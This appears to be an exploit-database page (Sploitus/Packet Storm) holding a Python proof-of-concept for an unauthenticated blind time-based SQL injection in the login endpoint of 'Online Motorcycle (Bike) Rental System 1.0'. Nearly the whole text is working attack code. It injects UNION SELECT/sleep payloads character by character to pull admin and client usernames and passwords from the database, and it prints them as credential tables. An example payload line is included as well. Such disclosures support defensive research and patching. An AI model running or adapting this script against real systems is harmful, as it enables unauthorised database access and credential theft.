Share
## https://sploitus.com/exploit?id=PACKETSTORM:164545
# Exploit Title: Online Motorcycle (Bike) Rental System 1.0 - Blind Time-Based SQL Injection (Unauthenticated)  
# Exploit Author: Chase Comardelle(CASO)  
# Date: October 18, 2021  
# Vendor Homepage: https://www.sourcecodester.com/php/14989/online-motorcycle-bike-rental-system-phpoop-source-code.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/bike_rental_0.zip  
# Tested on: Kali Linux, Apache, Mysql  
# Vendor: oretnom23  
# Version: v1.0  
# Exploit Description:  
# Online Motorcycle (Bike) Rental System is vulnerable to a Blind Time-Based SQL Injection attack. This can lead attackers to remotely dump MySql database credentials  
  
  
#EXAMPLE PAYLOAD - test@email.com' UNION SELECT IF((SELECT SUBSTRING((SELECT password from users where username='admin'),1,1)='1'),sleep(10),'a'),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL;  
#EXAMPLE EXECUTION - python3 sqliExploit.py http://localhost/bike_rental/   
  
import requests  
import sys  
import urllib3  
import pyfiglet   
  
  
  
  
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)  
  
  
proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}  
  
  
  
def find_clients_usernames(url):  
clients = ""  
cookies = {'Cookie:':'PHPSESSID='}  
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}  
path = '/classes/Login.php?f=login_user'  
position = 1  
i=0  
while i <len(chars) :  
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(email+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])  
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)  
  
if r.elapsed.total_seconds() > 1:  
clients += chars[i]  
i=0  
position+=1  
else:  
i +=1   
return clients  
  
  
def find_db_usernames(url):  
users = ""  
cookies = {'Cookie:':'PHPSESSID='}  
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}  
path = '/classes/Login.php?f=login_user'  
position = 1  
i=0  
while i <len(chars) :  
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(username+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])  
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)  
  
if r.elapsed.total_seconds() > 1:  
users += chars[i]  
i=0  
position+=1  
else:  
i +=1   
return users  
  
def find_db_passwords(url):  
passwords = ""  
clientCount = 0  
cookies = {'Cookie:':'PHPSESSID='}  
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}  
path = '/classes/Login.php?f=login_user'  
position = 1  
i=0  
  
while i <len(chars) :  
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+users),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])  
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)  
  
if r.elapsed.total_seconds() > 1:  
passwords += chars[i]  
i=0  
position+=1  
else:  
i +=1   
  
return passwords  
  
def find_client_passwords(url):  
passwords = ""  
clientCount = 0  
cookies = {'Cookie:':'PHPSESSID='}  
headers = {'DNT': '1', 'SEC-GPC': '1', 'Referer' : 'http://localhost/bike_rental/','Origin': 'http://localhost','X-Requested-With' : 'XMLHttpRequest','Content-Type' : 'application/x-www-form-urlencoded; charset=UTF-8'}  
path = '/classes/Login.php?f=login_user'  
position = 1  
i=0  
  
while i <len(chars) :  
sqli = "email=test@email.com'UNION+SELECT+IF((SELECT+SUBSTRING((SELECT+GROUP_CONCAT(password+SEPARATOR+',')+from+clients),%s,1)='%s'),sleep(1),''),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--+-&password=test" %(position,chars[i])  
r = requests.post(url + path,data=sqli,headers=headers,cookies=cookies, verify=False)  
  
if r.elapsed.total_seconds() > 1:  
passwords += chars[i]  
i=0  
position+=1  
else:  
i +=1   
  
return passwords  
  
  
def create_table(users,passwords):  
  
  
for i in range(0,len(users)):  
print(users[i]," | ",passwords[i])  
  
def print_header():  
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")  
print("[*] Online Motorcycle (Bike) Rental System [*]")  
print("[*] Unauthenticated Blind Time-Based SQL Injection [*]")  
print("[*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*][*]")  
print("\n")  
print(pyfiglet.figlet_format(" CAS0", font = "slant" ))   
  
chars = [ 'a','b','c','d','e','f','g','h','i','j','k','l','m','n','o',  
'p','q','r','s','t','u','v','w','x','y','z','A','B','C','D',  
'E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S',  
'T','U','V','W','X','Y','Z','0','1','2','3','4','5','6','7',  
'8','9','@','#',",",'.']  
  
  
  
if __name__ == "__main__":  
try:  
url = sys.argv[1].strip()  
except IndexError:  
print("[-] Usage: %s <url>" % sys.argv[0])  
print("[-] Example: %s www.example.com" % sys.argv[0])  
sys.exit(-1)  
  
  
print_header()  
print("[*] RETRIEVING CREDENTIALS NOW [*]")  
dbUsernames = find_db_usernames(url)  
dbUsernames = dbUsernames.split(",")  
  
dbPasswords = find_db_passwords(url)  
dbPasswords = dbPasswords.split(",")  
  
print("[*] DATABASE CREDENTIALS [*]")  
create_table(dbUsernames,dbPasswords)  
  
clientUsernames = find_clients_usernames(url)  
clientsUsernames = clientUsernames.split(",")  
  
clientPasswords = find_client_passwords(url)  
clientPasswords = clientPasswords.split(",")  
  
print("[*] CLIENT CREDENTIALS [*]")  
create_table(clientsUsernames,clientPasswords)